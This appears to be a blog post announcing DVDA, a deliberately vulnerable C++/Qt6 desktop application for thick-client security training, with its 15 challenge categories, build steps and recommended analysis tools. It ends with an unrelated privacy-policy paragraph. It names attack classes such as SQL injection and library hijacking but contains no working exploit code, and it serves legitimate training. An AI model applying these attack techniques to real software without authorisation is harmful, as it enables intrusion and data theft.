Security training has a gap. Most courses, labs, and CTF challenges focus on web application vulnerabilities and while that’s valuable, it leaves an entire class of software largely unaddressed: thick client applications. These are native desktop apps the kind widely used in finance, healthcare, and enterprise IT and they carry many of the same vulnerabilities as web apps, plus a set of problems unique to how they’re built and deployed.
DVDA (Damn Vulnerable Desktop Application) is an open-source training tool built to address this. It is a deliberately insecure C++/Qt6 desktop application with 15 security challenges covering the most common thick client vulnerability classes.
What Is DVDA?
DVDA is a C++/Qt6 port of DVTA (Damn Vulnerable Thick Client Application), originally written in C#/.NET by @srini0x00. The port brings the same learning objectives to native C++ — a language that underlies a large share of real-world desktop software in security-sensitive environments.
The app simulates a simple expense tracker with login, registration, an admin panel, and data export functionality. Every feature is intentionally built with real security flaws, giving you a legal and controlled environment to find and exploit them.
The 15 Security Challenges
Each challenge is mapped to an OWASP category and assigned a difficulty rating. They can be tackled in any order.
Configuration File Exposure | OWASP A05 | Easy
SQL Injection — Authentication Bypass | OWASP A03 | Easy
SQL Injection — Registration | OWASP A03 | Easy
SQL Injection — Data Exfiltration | OWASP A03 | Medium
Insecure Local Data Storage | OWASP A02 | Easy
Insecure Logging | OWASP A09 | Easy
Weak Cryptography & Exposed Keys | OWASP A02 | Medium
CSV Injection | OWASP A03 | Medium
Sensitive Data in Memory | OWASP A02 | Hard
DLL / Dylib / SO Hijacking | OWASP A08 | Medium
Hardcoded Credentials | OWASP A07 | Easy
Cleartext Data in Transit | OWASP A02 | Medium
Debugger Detection Bypass | OWASP A04 | Medium
Plaintext Passwords in Database | OWASP A02 | Easy
Reverse Engineering — No Obfuscation | OWASP A04 | Medium
Why Thick Client Security Matters
Thick client applications handle sensitive data and operate with elevated trust in ways that make vulnerabilities particularly dangerous. A few reasons they deserve more attention:
- They often store credentials, tokens, or encryption keys locally — on disk, in memory, or in config files.
- Network traffic is not always routed through a proxy, making interception less obvious than with web apps.
- Native binaries can be reverse engineered to expose hardcoded secrets, business logic, and authentication mechanisms.
- DLL and shared library hijacking can allow local privilege escalation or code execution.
- Many thick clients connect directly to databases or internal APIs, making injection vulnerabilities high-impact.
These are not edge cases. They appear regularly in real-world thick client assessments across trading platforms, healthcare software, enterprise tooling, and more.
Getting Started
Prerequisites by platform:
- macOS: brew install qt cmake openssl
- Linux: apt install qt6-base-dev cmake libssl-dev g++
- Windows: Qt6, CMake, OpenSSL via the Qt installer + MSVC or MinGW
Build and run natively:
git clone https://github.com/FWDSEC/dvda.git
cd dvda
mkdir build && cd build
cmake ..
cmake –build .
./dvda
Run via Docker (Linux):
docker build -t dvda .
docker run –rm dvda
Recommended Tools
The following tools are useful across the challenges:
Ghidra / radare2 — reverse engineering and disassembly
sqlite3 — inspect the local database
strings / nm — static binary analysis
lldb / gdb — runtime debugging and memory inspection
Wireshark / tcpdump — capture and analyze network traffic
Updates to This Policy
This policy was last updated on August 18, 2025. We may update it periodically to reflect changes in our practices or regulations. Check back for the latest version.
For questions, contact us at info@forwardsecurity.com.